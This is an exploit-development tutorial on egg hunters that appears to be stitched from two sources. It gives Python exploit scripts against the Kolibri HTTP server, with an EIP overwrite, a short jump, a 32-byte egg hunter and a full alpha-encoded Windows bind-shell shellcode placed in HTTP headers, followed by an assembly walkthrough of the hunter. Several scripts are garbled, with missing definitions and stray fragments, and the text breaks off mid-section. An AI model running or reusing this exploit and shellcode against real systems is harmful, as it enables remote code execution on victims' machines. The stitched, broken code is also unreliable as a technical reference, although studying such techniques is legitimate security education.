place the egg hunter in the buffer space before overwriting EIP. To accomplish this we will
place a "short jump" instruction at ESP that will hop backwards in our buffer with enough
room for our egg hunter. This "short jump" only requires 2 bytes so we should restructure our
buffer as follows.
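#!/usr/bin/python
import socket
import os
import sys
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
# (1) EIP: 0x77C35459 (pointer that redirects execution to ESP) #
# (2) ESP: two B's, placeholder for the 2-byte short jump #
#-------------------------------------------------------------------------------#
# Assumption: the EIP pointer is the breakpoint address used later in the text
Stage1 = b"A"*515 + b"\x59\x54\xC3\x77" + b"B"*2
# Assumption: Stage1 is sent as the path of a HEAD request (the request line is not shown)
buffer = (
b"HEAD /" + Stage1 + b" HTTP/1.1\r\n"
b"Host: 192.168.111.128:8080\r\n"
b"Keep-Alive: 115\r\n"
b"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()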
After reattaching Kolibri in the debugger and executing our POC we see that we do hit our
breakpoint.
Breakpoint
Perfect!! If we step through these instructions with F7 we will be brought back to our two
B's located at ESP. Time to make our opcode that will jump back 60 bytes (this is just an
arbitrary value which should provide enough space). The "short jump" opcode starts with
"\xEB" followed by the distance we need to jump, encoded as a signed byte. To get this value
we will use one of the only useful tools that comes pre-packaged with Windows hehe, observe
the screenshots below.
While developing exploits you will learn to appreciate the usefulness of Windows calculator.
Anyway let's put our theory to the test, the new buffer should look like this:
After we step through the breakpoint at EIP we get redirected to ESP which contains our “short
jump” opcode and if we take the jump with F7 we will jump back 60-bytes in our buffer
relative to our current position and land nicely in our A's. You can see this in the screenshots
below.
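The calculator step amounts to writing -60 as a signed 8-bit value. A small Python helper
does the same conversion; the name short_jmp is our own, and the distance is measured from
the end of the 2-byte jump instruction, as the CPU does for this opcode.

```python
def short_jmp(rel8: int) -> bytes:
    """Encode an x86 short jump (opcode EB) with a signed 8-bit displacement."""
    if not -128 <= rel8 <= 127:
        raise ValueError("a short jump can only reach -128..+127 bytes")
    # Masking with 0xFF gives the two's complement byte for negative values.
    return bytes([0xEB, rel8 & 0xFF])
```

short_jmp(-60) yields the two bytes EB C4 used in the buffer, since 256 - 60 = 196 = 0xC4.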
\xEB\xC4
Buffer
All that remains for "Stage1" is to generate and insert our egg hunter in our buffer. You
could use or manually modify the egg hunter at the beginning of this tutorial but like I said
before "!mona" contains an option to generate an egg hunter and specify a custom tag so let's
have a look at that.
Mona Egghunter
Since we know that the egg hunter is 32-bytes long we can easily insert it into our buffer with a
bit of calculation. You can see our final "Stage1" POC below and a screenshot that shows the
egg hunter has been placed nicely between our "short jump" and overwriting EIP.
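The "bit of calculation" can be written down explicitly. The sketch below works out how much
padding goes in front of the hunter and where the short jump lands. The 5 bytes of padding
between the hunter and EIP are an assumption of ours; any split works as long as the jump
lands at or before the first byte of the hunter.

```python
EIP_OFFSET = 515   # bytes before the EIP overwrite, from the pattern offsets
HUNTER_LEN = 32    # size of the egg hunter
JUMP_BACK = 60     # displacement of the short jump, measured from its end

def stage1_layout(pad_after_hunter: int = 5):
    """Return (leading_pad, landing_offset) for a hunter placed before EIP."""
    leading_pad = EIP_OFFSET - HUNTER_LEN - pad_after_hunter
    jump_offset = EIP_OFFSET + 4            # the short jump sits right after EIP
    landing = jump_offset + 2 - JUMP_BACK   # where execution resumes
    if landing > leading_pad:
        raise ValueError("the jump would land inside or past the egg hunter")
    return leading_pad, landing
```

stage1_layout() returns (478, 461): execution lands in the A's at offset 461 and slides
through 17 of them before reaching the hunter at offset 478.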
Egghunter
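#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
b"\x66\x81\xca\xff"
b"\x0f\x42\x52\x6a"
b"\x02\x58\xcd\x2e"
b"\x3c\x05\x5a\x74"
b"\xef\xb8\x62\x33" #b3
b"\x33\x66\x8b\xfa" #3f
b"\xaf\x75\xea\xaf"
b"\x75\xe7\xff\xe7")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
# (1) EIP: 0x77C35459 (pointer that redirects execution to ESP) #
# (2) ESP: short jump back 60 bytes => \xEB\xC4 #
# (3) Egg hunter placed in the padding before EIP #
#-------------------------------------------------------------------------------#
# Assumption: 478 + 32 + 5 = 515 is one split that keeps the hunter after the landing point
Stage1 = b"A"*478 + hunter + b"A"*5 + b"\x59\x54\xC3\x77" + b"\xEB\xC4"
# Assumption: Stage1 is sent as the path of a HEAD request (the request line is not shown)
buffer = (
b"HEAD /" + Stage1 + b" HTTP/1.1\r\n"
b"Host: 192.168.111.128:8080\r\n"
b"Keep-Alive: 115\r\n"
b"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()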
So this is the state of affairs. Our buffer overflow redirects execution to our egg hunter which
searches in memory for our final stage shellcode (which for the moment doesn't exist of
course). Don't run the exploit because the egg hunter will permanently spike the CPU up to
100% while it looks for the nonexistent egg...
Setting up Stage2
The question remains: where can we put our “Stage2”, which contains our egg? HTTP requests
that contain buffer overflows have a unique quality. The HTTP request packet contains several
“fields”, not all of them necessary (in fact the packet we are sending in our exploit is
already stripped down considerably). For the sake of simple explanation let's call these
fields 1,2,3,4,5. If there is a buffer overflow in field 1, normally we would assume that
field 2 is just an extension of field 1, as if it was just appended to field 1. However, as
we will see, these different “fields” will each have their own location in memory, and even
though field 1 (or Stage1 in our case) contains a buffer overflow, the other fields will, at
the time of the crash, be loaded separately into memory.
Let's see what happens when we inject a metasploit pattern of 1000-bytes in the “User-Agent”
field. You can see the new POC below...
#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
buffer = (
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
Attach Kolibri to the debugger and put a breakpoint on 0x77C35459, because we need !mona
to search for the metasploit pattern and we don't want the egg hunter code to run. As you
can see from the screenshot below, we can find the complete metasploit
pattern in memory (not once but three times). In fact I did a bit of testing and we can inject
even larger chunks of buffer space, though 1000 bytes should be enough.
Metasploit Pattern
Essentially it's Game Over at this point: if we use this buffer space in Stage2 to insert our egg
tag and, right after it, our payload, the egg hunter will find and execute it!
As usual, two things remain: (1) modifying our POC so it's ready to accept our
shellcode and (2) generating a payload that is to our liking. You can see the final POC below;
notice that Stage2 contains our egg tag. Any shellcode that is placed in the shellcode variable
will get executed by our egg hunter.
#!/usr/bin/python
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
shellcode = (
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
# Stage2: #
# (4) We embed the final stage payload in the HTTP header, which will be put #
# somewhere in memory at the time of the initial crash, b00m Game Over!! #
#-------------------------------------------------------------------------------#
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
Ok, so before generating our shellcode there is some final trickery to deal with. After some
testing I noticed that the bad character set did not apply to our Stage2 buffer. If you recreate
this exploit, feel free to do a proper bad character analysis. Since we know for a fact that an
ASCII buffer will not cause any problems (as we can find the metasploit pattern intact) and we
know that we have more than enough room (I think I tested Stage2 up to 3000 bytes), we can
simply generate a payload that is ASCII-encoded.
root@bt:~# msfpayload -l
[...snip...]
windows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and
spawn a
command shell
[...snip...]
Module: payload/windows/shell_bind_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 341
Rank: Normal
Provided by:
vlad902 <[email protected]>
sf <[email protected]>
Basic options:
Description:
"\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c"
"\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b"
"\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b"
"\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35"
"\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31"
"\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37"
"\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30"
"\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45"
"\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50"
"\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74"
"\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c"
"\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39"
"\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51"
"\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59"
"\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b"
"\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70"
"\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54"
"\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43"
"\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50"
"\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53"
"\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67"
"\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37"
"\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70"
"\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f"
"\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70"
"\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54"
"\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61"
"\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d"
"\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42"
"\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73"
"\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63"
"\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59"
"\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e"
"\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55"
"\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71"
"\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71"
"\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d"
"\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46"
"\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36"
"\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e"
"\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66"
"\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b"
"\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58"
"\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56"
"\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75"
"\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61"
"\x43\x4b\x4f\x4b\x65\x41\x41";
#!/usr/bin/python
#-------------------------------------------------------------------------------#
# Software: http://cdn01.exploit-db.com/wp-content/themes/exploit/applications/ #
# f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe #
#-------------------------------------------------------------------------------#
# series - http://www.fuzzysecurity.com/tutorials/expDev/4.html #
#-------------------------------------------------------------------------------#
# #
# C:\Documents and Settings\Administrator\Desktop> #
#-------------------------------------------------------------------------------#
import socket
import os
import sys
#Egghunter
#Size 32-bytes
hunter = (
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33" #b3
"\x33\x66\x8b\xfa" #3f
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7")
shellcode = (
"\xdb\xcf\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"
"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c"
"\x4a\x48\x6d\x59\x67\x70\x77\x70\x67\x70\x53\x50\x4d\x59\x4b"
"\x55\x75\x61\x49\x42\x35\x34\x6c\x4b\x52\x72\x70\x30\x6c\x4b"
"\x43\x62\x54\x4c\x4c\x4b\x62\x72\x76\x74\x6c\x4b\x72\x52\x35"
"\x78\x36\x6f\x6e\x57\x42\x6a\x76\x46\x66\x51\x6b\x4f\x50\x31"
"\x69\x50\x6c\x6c\x75\x6c\x35\x31\x53\x4c\x46\x62\x34\x6c\x37"
"\x50\x6f\x31\x58\x4f\x74\x4d\x75\x51\x49\x57\x6d\x32\x4c\x30"
"\x66\x32\x31\x47\x4e\x6b\x46\x32\x54\x50\x4c\x4b\x62\x62\x45"
"\x6c\x63\x31\x68\x50\x4c\x4b\x61\x50\x42\x58\x4b\x35\x39\x50"
"\x33\x44\x61\x5a\x45\x51\x5a\x70\x66\x30\x6c\x4b\x57\x38\x74"
"\x58\x4c\x4b\x50\x58\x57\x50\x66\x61\x58\x53\x78\x63\x35\x6c"
"\x62\x69\x6e\x6b\x45\x64\x6c\x4b\x76\x61\x59\x46\x45\x61\x39"
"\x6f\x70\x31\x39\x50\x6c\x6c\x4f\x31\x48\x4f\x66\x6d\x45\x51"
"\x79\x57\x46\x58\x49\x70\x50\x75\x39\x64\x73\x33\x61\x6d\x59"
"\x68\x77\x4b\x53\x4d\x31\x34\x32\x55\x38\x62\x61\x48\x6c\x4b"
"\x33\x68\x64\x64\x76\x61\x4e\x33\x43\x56\x4c\x4b\x44\x4c\x70"
"\x4b\x6e\x6b\x51\x48\x35\x4c\x43\x31\x4b\x63\x4e\x6b\x55\x54"
"\x6e\x6b\x47\x71\x48\x50\x4c\x49\x31\x54\x45\x74\x36\x44\x43"
"\x6b\x43\x6b\x65\x31\x52\x79\x63\x6a\x72\x71\x39\x6f\x6b\x50"
"\x56\x38\x33\x6f\x50\x5a\x4c\x4b\x36\x72\x38\x6b\x4c\x46\x53"
"\x6d\x42\x48\x47\x43\x55\x62\x63\x30\x35\x50\x51\x78\x61\x67"
"\x43\x43\x77\x42\x31\x4f\x52\x74\x35\x38\x70\x4c\x74\x37\x37"
"\x56\x37\x77\x4b\x4f\x78\x55\x6c\x78\x4c\x50\x67\x71\x67\x70"
"\x75\x50\x64\x69\x49\x54\x36\x34\x36\x30\x35\x38\x71\x39\x6f"
"\x70\x42\x4b\x55\x50\x79\x6f\x4a\x75\x66\x30\x56\x30\x52\x70"
"\x76\x30\x77\x30\x66\x30\x73\x70\x66\x30\x62\x48\x68\x6a\x54"
"\x4f\x4b\x6f\x4b\x50\x79\x6f\x78\x55\x4f\x79\x59\x57\x75\x61"
"\x6b\x6b\x42\x73\x51\x78\x57\x72\x35\x50\x55\x77\x34\x44\x4d"
"\x59\x4d\x36\x33\x5a\x56\x70\x66\x36\x43\x67\x63\x58\x38\x42"
"\x4b\x6b\x64\x77\x50\x67\x39\x6f\x4a\x75\x66\x33\x33\x67\x73"
"\x58\x4f\x47\x4d\x39\x55\x68\x69\x6f\x49\x6f\x5a\x75\x33\x63"
"\x32\x73\x53\x67\x42\x48\x71\x64\x6a\x4c\x47\x4b\x59\x71\x59"
"\x6f\x5a\x75\x30\x57\x4f\x79\x78\x47\x61\x78\x34\x35\x30\x6e"
"\x70\x4d\x63\x51\x39\x6f\x69\x45\x72\x48\x75\x33\x50\x6d\x55"
"\x34\x57\x70\x6f\x79\x5a\x43\x43\x67\x71\x47\x31\x47\x54\x71"
"\x5a\x56\x32\x4a\x52\x32\x50\x59\x66\x36\x58\x62\x39\x6d\x71"
"\x76\x4b\x77\x31\x54\x44\x64\x65\x6c\x77\x71\x37\x71\x4c\x4d"
"\x37\x34\x57\x54\x34\x50\x59\x56\x55\x50\x43\x74\x61\x44\x46"
"\x30\x73\x66\x30\x56\x52\x76\x57\x36\x72\x76\x42\x6e\x46\x36"
"\x66\x36\x42\x73\x50\x56\x65\x38\x42\x59\x7a\x6c\x67\x4f\x4e"
"\x66\x79\x6f\x4a\x75\x4d\x59\x6b\x50\x62\x6e\x76\x36\x42\x66"
"\x4b\x4f\x36\x50\x71\x78\x54\x48\x4c\x47\x75\x4d\x51\x70\x4b"
"\x4f\x48\x55\x6f\x4b\x6c\x30\x78\x35\x6f\x52\x33\x66\x33\x58"
"\x6c\x66\x4f\x65\x6f\x4d\x4f\x6d\x6b\x4f\x7a\x75\x75\x6c\x56"
"\x66\x51\x6c\x65\x5a\x4b\x30\x79\x6b\x69\x70\x51\x65\x77\x75"
"\x6d\x6b\x30\x47\x36\x73\x31\x62\x62\x4f\x32\x4a\x47\x70\x61"
"\x43\x4b\x4f\x4b\x65\x41\x41")
#-------------------------------------------------------------------------------#
# badchars: \x00\x0d\x0a\x3d\x20\x3f #
#-------------------------------------------------------------------------------#
# Stage1: #
#-------------------------------------------------------------------------------#
# Stage2: #
# (*) For reliability we use the x86/alpha_mixed encoder (we have as much space #
# badcharacters. #
# (4) We embed the final stage payload in the HTTP header, which will be put #
# somewhere in memory at the time of the initial crash, b00m Game Over!! #
#-------------------------------------------------------------------------------#
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.111.128:8080\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl.connect(("192.168.111.128", 8080))
expl.send(buffer)
expl.close()
In the screenshot below you can see Kolibri receiving our evil HTTP request and the output of
“netstat -an” showing that our bindshell is listening and below that the output when we
connect to it, b00m Game Over!!
Game Over!
ipconfig
Windows IP Configuration
IP Address. . . . . . . . . . . . : 192.168.111.128
Default Gateway . . . . . . . . . :
http://www.fuzzysecurity.com/tutorials/expDev/4.html
• First, you must have a minimum amount of predictable memory to which you can
jump that holds the small Egghunter code.
• Second, your shellcode must be available in its entirety somewhere in memory (on the
stack or heap).
Keep in mind that because we’re dealing with a limited buffer space, the Egghunter itself should be
as small as possible to be useful in these situations. To understand the details behind
Egghunting, your first resource should be Matt Miller’s (skape) paper titled “Safely Searching
Process Virtual Address Space”. In it, he describes the various methods in which one can use
Egghunters to search available memory in order to locate and execute otherwise
difficult-to-find exploit code. He provides several Linux and Windows-based examples, some optimized
more than others. For the purposes of this tutorial I’m only going to focus on the smallest (only
32 bytes), most optimized Windows version, which uses NtDisplayString. Please note that this
method only works on 32-bit NT versions of Windows. All the examples that follow were
tested on Windows XP SP3. I’ll limit the discussion for now until I get into 64-bit Windows-based
exploits in later posts.
• Use the EIP overwrite to jump to a predictable location that holds a small Assembly
language routine (the “Egghunter”) which searches memory for the “egg” and, when
found, jumps to it to execute the shellcode.
The egg will be a 4 byte string, repeated once. Let’s say our string is “PWND”, the egg we will
prepend to our shellcode will be PWNDPWND. The reason for the repetition is to ensure that
when we locate it in memory, we can verify we’ve actually found our shellcode (and not a
random collection of 4 bytes, or the Egghunter routine itself) — it’s simply a way to double
check we’ve reached our shellcode.
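To make the egg layout concrete, here is a minimal Python sketch. The shellcode bytes are a harmless placeholder chosen for this illustration and are not from the original exploit. It shows the doubled tag being prepended and how the 4-byte tag reads as a little-endian dword, which is the value the Egghunter compares against.

```python
import struct

tag = b"PWND"                 # the 4-byte string from the text
egg = tag * 2                 # repeated once -> PWNDPWND
shellcode = b"\xcc" * 4       # placeholder bytes only (assumption for the demo)
payload = egg + shellcode     # the egg is prepended to the shellcode

# x86 is little-endian, so the tag is loaded into a register "backwards".
eax_value = struct.unpack("<I", tag)[0]
print(hex(eax_value))
```

This is why the Egghunter listing later in the section loads 0x444e5750 rather than the bytes in reading order.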
The Egghunter we’re going to implement will use (abuse) NtDisplayString, a read-only function
that is designed to take a single argument — a pointer to a string — and display it.
NTSTATUS NtDisplayString(
IN PUNICODE_STRING String
);
Instead of using the function to display strings as intended, we’re going to sequentially work
our way through memory address pointers and pass them to it, one at a time. If the function
returns an access violation error when it attempts to read from that memory location, we
know we’ve reached an inaccessible portion of memory and must look elsewhere for our
shellcode. If it doesn’t return an error, we know we can examine the contents of that memory
location for our egg. It’s a simple and elegant solution to testing the availability of memory to
look for our egg. Here’s the code (adapted from Skape’s original version found here). Note: in
that version, he uses NtAccessCheckAndAuditAlarm instead of NtDisplayString. As he explains
in his paper (see earlier link), they both serve the same purpose and the only difference in
terms of the code is the syscall number.
entry:
loop_inc_page:
or dx, 0x0fff // set the low 12 bits of edx (PAGE_SIZE-1 = 4095) to point at the last byte of the current page
loop_inc_one:
inc edx // loop through addresses in the memory page one by one
make_syscall:
push edx // push edx value (current address) onto the stack to save for future reference
push 0x43 // push 0x43 (the Syscall ID for NtDisplayString) onto the stack
pop eax // pop 0x43 into eax to use as the parameter to syscall
int 0x2e // issue the interrupt to call NtDisplayString kernel function
check_is_valid:
cmp al, 0x05 // compare low order byte of eax to 0x5 (5 = access violation)
pop edx // restore edx from the stack
jz loop_inc_page // if the zf flag was set by cmp instruction there was an access violation
// and the address was invalid so jmp back to loop_inc_page
is_egg:
mov eax, 0x444e5750 // if the address was valid, move the egg into eax for comparison
mov edi, edx // set edi to the current address pointer in edx for use in the scasd instruction
scasd // compares value in eax to dword value addressed by edi (current address pointer)
// and sets EFLAGS register accordingly; after scasd comparison,
// EDI is automatically incremented by 4 if DF flag is 0 or decremented if flag is 1
jnz loop_inc_one // egg not found? jump back to loop_inc_one
scasd // first 4 bytes of egg found; compare the dword in edi to eax again
// (remember scasd automatically advanced by 4)
jnz loop_inc_one // only the first half of the egg was found; jump back to loop_inc_one
found:
jmp edi //egg found!; thanks to scasd, edi now points to shellcode
I’ve included a C version below in case you want to compile it and load it into a debugger as a
stand-alone .exe to follow along (please note that your addresses are likely going to vary).
https://www.securitysift.com/download/egghunter.c
Let’s walk through the code in detail, starting from loop_inc_page. First, the or instruction sets
the low 12 bits of EDX (page_size – 1, or 4095), which moves the current address to the last
byte of the current memory page. The next instruction increments the value of EDX by 1. This
effectively brings us to the very first address in the next page we want to search. You might wonder
why we didn’t just add 4096 to EDX, instead of breaking it into two instructions. The reason is
that we need to maintain two separate loops: one to loop through each page and the
other to loop through each address of a valid page one by one.
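The page-stepping arithmetic can be checked with a small Python model. This is only a sketch of the two instructions, with a made-up function name, operating on a plain integer that stands in for EDX.

```python
PAGE_MASK = 0x0FFF  # PAGE_SIZE - 1 for 4096-byte pages

def next_page_start(edx):
    """Model 'or dx, 0x0fff' followed by 'inc edx' on a 32-bit value."""
    edx |= PAGE_MASK                 # or dx, 0x0fff -> last byte of the current page
    edx = (edx + 1) & 0xFFFFFFFF     # inc edx       -> first byte of the next page
    return edx

print(hex(next_page_start(0x00000000)))
print(hex(next_page_start(0x0012F18C)))
```

Note that entering at the inc alone (loop_inc_one) advances by a single byte, which is what lets the same code serve both the page loop and the address loop.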
As we increment through each address, we make the call to NtDisplayString to see if it’s valid.
Before we do, the value in EDX must be saved to the stack since we need to return to that
location after the syscall; otherwise it will be clobbered by the syscall. After
saving EDX, we load the syscall number of NtDisplayString (0x43) into EAX. [If you want to find
the numbers of the various Windows syscalls, check out this
resource: http://j00ru.vexillium.org/ntapi/ ]
With EDX saved and the syscall parameter loaded into EAX, we’re ready to issue the interrupt
and make the syscall. Once the syscall is made, the low byte of EAX (AL) will be 0x05 if the
attempt to read that memory location resulted in an access violation. If this happens, we know
we’re attempting to read from an inaccessible memory page, so we go back to loop_inc_page and
the next memory page is loaded into EDX.
This page loop will continue until a valid memory page is found.
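The reason a one-byte compare is enough can be shown in a couple of lines of Python. The sketch assumes the standard NTSTATUS value for an access violation, STATUS_ACCESS_VIOLATION (0xC0000005), which is what a failed read is expected to return in EAX.

```python
STATUS_ACCESS_VIOLATION = 0xC0000005  # standard NTSTATUS code (assumed return value)

eax = STATUS_ACCESS_VIOLATION
al = eax & 0xFF                       # AL is the low-order byte of EAX
page_is_invalid = (al == 0x05)        # what 'cmp al, 0x05' followed by 'jz' tests
print(hex(al), page_is_invalid)
```

Comparing only AL keeps the instruction at two bytes instead of the five needed to compare the full dword.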
Once a valid memory address is found, the execution flow diverts to is_egg. Now that it has
located a valid address, the next step is to compare our egg to the contents of that address. To
do so, we load the egg into EAX and move (copy) our valid address from EDX to EDI for use by
the next SCASD instruction.
You might wonder why we don’t just compare the value in EAX to the value in EDX directly. It’s
because using the SCASD instruction is actually more efficient since it not only sets us up for
the following jump instruction but it also automatically increments EDI by 4 bytes after each
comparison. This allows us to check both halves of the egg and immediately jump to our
shellcode once an egg is found, without the need for unnecessary Assembly instructions.
If the contents of EAX and the contents pointed to by the memory address in EDI don’t match,
we haven’t found our egg so execution flow loops back to the INC EDX instruction which will
grab the next address within the current page for comparison.
Once the first half of the egg is found, the SCASD instruction is repeated to check for the
second half. If that’s also a match, we know we’ve found our egg so we jump to EDI, which
thanks to the SCASD instruction, now points directly to our shellcode.
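The search logic described above can be modelled in Python over an ordinary bytes object. This is a simplified simulation only: the function name is made up, there is no page validation, and a byte offset stands in for the address in EDX/EDI.

```python
def hunt(memory, tag):
    """Return the offset just past the first doubled tag, or None if absent."""
    size = len(tag)
    for addr in range(len(memory) - 2 * size + 1):      # loop_inc_one
        if memory[addr:addr + size] != tag:              # first scasd
            continue
        if memory[addr + size:addr + 2 * size] != tag:   # second scasd
            continue
        return addr + 2 * size                           # jmp edi
    return None

# A lone tag (for example the one embedded in the hunter) must not match.
memory = b"\x00" * 10 + b"PWND" + b"junk" + b"PWNDPWND" + b"\x90\x90"
start = hunt(memory, b"PWND")
print(start, memory[start:])
```

The single PWND at offset 10 is skipped because the dword after it does not match, which is exactly the job of the repeated tag.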
Now that you understand how the Egghunter works, let’s see how to incorporate it into our
exploit payload. I’ll once again use the CoolPlayer exploit from Part 4. If you recall, from Part 4,
at the time of EIP overwrite, ESP points to only a small portion of our buffer — too small for
our shellcode, but more than enough space for an Egghunter. Let’s update our previous exploit
script.
First, we need to obtain the opcodes for the Assembly instructions and convert them to hex
format for our Perl script. Depending on how you write the Egghunter (MASM, C, etc) there
are varying ways in which you can extract the associated opcode. For this demo, I’m simply
going to grab them from Immunity during runtime of my Egghunter executable (compiled from
the C code I provided earlier).
If you use this method, you can copy it to the clipboard or export it to a file and then convert it
to script-friendly hex using any number of command line scripts such as this:
$egghunter =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x50\x57\x4E\x44\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
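Before pasting opcodes into a script, it is worth confirming the byte count and the jump targets. The following Python sketch (the helper name rel8_target is an assumption for this illustration) checks that the string above is 32 bytes and decodes where each short conditional jump lands, using the rule that a rel8 displacement is counted from the end of the 2-byte jump.

```python
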